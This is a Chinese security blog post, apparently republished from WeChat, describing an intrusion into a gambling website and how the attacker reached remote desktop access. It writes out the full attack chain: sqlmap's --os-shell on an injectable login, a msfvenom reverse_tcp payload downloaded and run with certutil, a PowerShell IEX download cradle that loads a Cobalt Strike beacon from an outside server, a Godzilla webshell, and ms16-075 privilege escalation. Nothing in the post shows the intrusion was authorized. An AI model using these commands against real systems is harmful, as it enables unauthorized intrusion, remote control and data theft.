棋牌站注入到远程桌面
2022-10-11 08:1:40 Author: 李白你好(查看原文) 阅读量:32 收藏

免责声明

由于传播、利用本公众号李白你好所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号李白你好及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

01 后台


登录,抓包,然后直接sqlmap跑,因为知道存在注入,所以直接 --os-shell 了。

sqlmap -r 1.txt --os-shell

02 上线CS

进入shell之后,使用 windows自带的certutil.exe (win XP到win10 都自带这个工具) 来下载我们的 msf 生成的木马

msf 生成木马的命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.146 LPORT=4444 -f exe > artifact.exe

然后在生成木马的目录下,利用python开启一个HTTP服务:

python -m SimpleHTTPServer

利用 certutil.exe 来下载木马,并执行,反弹一个shell到msf上面:

certutil.exe -urlcache -split -f "http://1.1.1.1:8000/artifact.exe" D:/artifact.exe && D:/artifact.exe

这个账户的权限太低了,这个工具不能使用 ,直接上传也不行,使用power shell下载也没成功。

掏出小本本,看见之前power shell的笔记,可以直接远程执行 power shell 命令。

打开CS,开启监听

生成 payload,然后从远程服务器上面执行 powershell 代码:

powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://1.1.1.1:8000/xiaoz.ps1'))"

ok,CS这边上线了,可以开始多人游戏了。手动滑稽。

03 提权+RDP

提权用 ms16-075 ,哥斯拉这个webshell 管理工具集成了这个提权补丁。

也可以使用msf来提权,但是我msf生成的powershell反弹连接,反弹不过来,CS的会话分发到msf也没成功,菜就用大佬写好的工具就好了.

下载地址:https://github.com/BeichenDream/Godzilla/releases

生成一个哥斯拉的webshell,但是不知道传到哪个web路径里面。

nmap扫一下 ,然后在 90 端口,发现了和上面文件相对应的目录

然后上传 哥斯拉生成的 webshell ,提权就完了。

后面就为所欲为了,再次手动滑稽。附上一张远程的图

目的达到,完事关电脑

04 往期回顾

护士姐姐才是医院的口子

记一次对某非法微盘的渗透

假期结束了,可以利用攻防WIKI学习了

Z-Blog 后台getshell+提权一把梭

台湾省电视剧黑客VS大陆网剧黑客

文章来源:网络安全情报攻防站

原文地址:https://t.zsxq.com/04NZbUZvR

如需转载本样式风格、字体版权请保留出处:李白你好


文章来源: http://mp.weixin.qq.com/s?__biz=MzkwMzMwODg2Mw==&mid=2247494515&idx=1&sn=bf2f8443d205c902e42b1c9a6c35b41c&chksm=c09a9823f7ed113505f03e4ef46b2be3cc7d6cd0cc7312d2509806d2189b14d84a9c7c3a23a5#rd
如有侵权请联系:admin#unsafe.sh